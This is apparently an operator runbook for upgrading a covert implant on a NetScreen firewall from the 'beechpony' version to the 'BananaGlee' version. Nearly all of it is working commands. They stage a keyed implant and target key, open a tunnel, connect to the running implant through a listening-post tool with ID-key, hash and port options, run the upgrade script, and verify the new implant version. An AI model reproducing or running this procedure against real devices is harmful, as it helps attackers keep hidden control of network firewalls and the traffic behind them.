##### Upgrading a netscreen from a version of beechpony to BG ##### # This is an on the fly upgrade. After you run the upgrade script, you'll have a running version of BG on the target netscreen box. # These instructions assume you've already created the BG implant for this NS box and named it "project.ip_bg2011_ppc_implant". # You also need the key for this target. You'll use the same project.ip.key for BG that was used for BP. # First connect to the netscreen with the LP and verify you can connect, and that the version of BP is what you think it is. # Second verify with the analyst if this target has a unilateral or multilateral implant on it. # Last upgrade it. ###### # Copy the fw.zip to /current/bin/ and unzip it. cp /mnt/zip/fw.zip /current/bin/ unzip /current/bin/fw.zip # Copy the keyed BG target implant to the BP upgrade directory cp /mnt/zip/project.ip_bg2011_ppc_implant /current/bin/FW/BANANAGLEE_2.0.1.1/Install/Implant/BANANAGLEE-BEECHPONY_UPGRADE_1.0.0.0 # Copy the target project.ip.key to the BP upgrade directory cp /mnt/zip/project.ip.key /current/bin/FW/BANANAGLEE_2.0.1.1/Install/Implant/BANANAGLEE-BEECHPONY_UPGRADE_1.0.0.0 # Go to the BP Upgrade directory cd /current/bin/FW/BANANAGLEE_2.0.1.1/Install/Implant/BANANAGLEE-BEECHPONY_UPGRADE_1.0.0.0/bp_utils ## For multilateral implant: # Use lp_2p for the lp, use upgrade_2p for the upgrading script. ## For unilateral implant: # Use lp for the lp, use upgrade for the upgrading script. # Setup tunnel on pitch -tunnel u 48045 500 500 # Connect to the implant to verify it's running: ./lp_2p --lp --implant --idkey ../project.ip.key --hash sha1 --timeout 10 --sport 35686 --dport 48045 # Go back one dir to where the upgrade and upgrade_2p scripts are at. cd ../ # Now lets upgrade... ./upgrade_2p --lp --implant --idkey project.ip.key --sport 35686 --dport 48045 --file project.ip_bg2011_ppc_implant # Now you can use the BG lp to connect to your new BG implant using the same key :) cd bg_utils # Connect to it and open a session. You should see "Implant Version: 2.0.1". ./lp --lp --implant --idkey ../project.ip.key --hash sha1 --timeout 10 --sport 35686 --dport 48045